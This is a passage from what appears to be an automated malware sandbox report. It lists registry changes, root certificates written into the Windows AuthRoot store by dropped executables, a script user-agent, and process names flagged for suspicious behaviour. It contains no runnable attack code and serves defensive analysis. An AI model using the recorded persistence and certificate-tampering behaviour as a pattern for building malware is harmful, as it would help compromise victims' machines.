"0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media msiexec.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 1643021.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun05ac1b0207d3ff3b8.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Sun05d60bc3b96248e5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun05ac1b0207d3ff3b8.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun05ac1b0207d3ff3b8.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun05ac1b0207d3ff3b8.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 1643021.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 1643021.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Sun05d60bc3b96248e5.exe -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 7 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 63 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 177 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 4 IoCs
pid Process 2672 AdvancedWindowsManager.exe 4012 installer.exe 4080 anyname.exe 3220 gcleaner.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 836 powershell.exe 1972 WerFault.exe 1972 WerFault.exe 1972 WerFault.exe 1972 WerFault.exe 1972 WerFault.exe 1972 WerFault.exe 1972 WerFault.exe 1972 WerFault.exe 2496 WerFault.exe 2496 WerFault.exe 2496 WerFault.exe 2496 WerFault.exe 2496 WerFault.exe 2496 WerFault.exe 2496 WerFault.exe 2496 WerFault.exe 2496 WerFault.exe 2656 conhost.exe 2772 setup_2.tmp 2772 setup_2.tmp 2592 8873424.exe 3004 5675673.exe 2500 WerFault.exe 2500 WerFault.exe 2500 WerFault.exe 2500 WerFault.exe 2500 WerFault.exe 2500 WerFault.exe 2500 WerFault.exe 2500 WerFault.exe 2500 WerFault.exe 1640 ultramediaburner.tmp 1640 ultramediaburner.tmp 1084 services64.exe 392 WerFault.exe 392 WerFault.exe 392 WerFault.exe 392 WerFault.exe 392 WerFault.exe 392 WerFault.exe 392 WerFault.exe 392 WerFault.exe 392 WerFault.exe 3616 WerFault.exe 3616 WerFault.exe 3616 WerFault.exe 3616 WerFault.exe 3616 WerFault.exe 3616 WerFault.exe 3616 WerFault.exe 3616 WerFault.exe 3616 WerFault.exe 1916 Sun052bbd8bebd9.exe 3924 explorer.exe 3924 explorer.exe 3924 explorer.exe 3924 explorer.exe 3924 explorer.exe 3924 explorer.exe 3924 explorer.exe 3924 explorer.exe 3924 explorer.exe 3924 explorer.exe -
Suspicious behavior: GetForegroundWindowSpam 9 IoCs
pid Process 1972 WerFault.exe 2496 WerFault.exe 2500 WerFault.exe 392 WerFault.exe 3616 WerFault.exe 848 WerFault.exe 3376 WerFault.exe 1668 WerFault.exe 3624 iexplore.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 1960 5058535.exe -
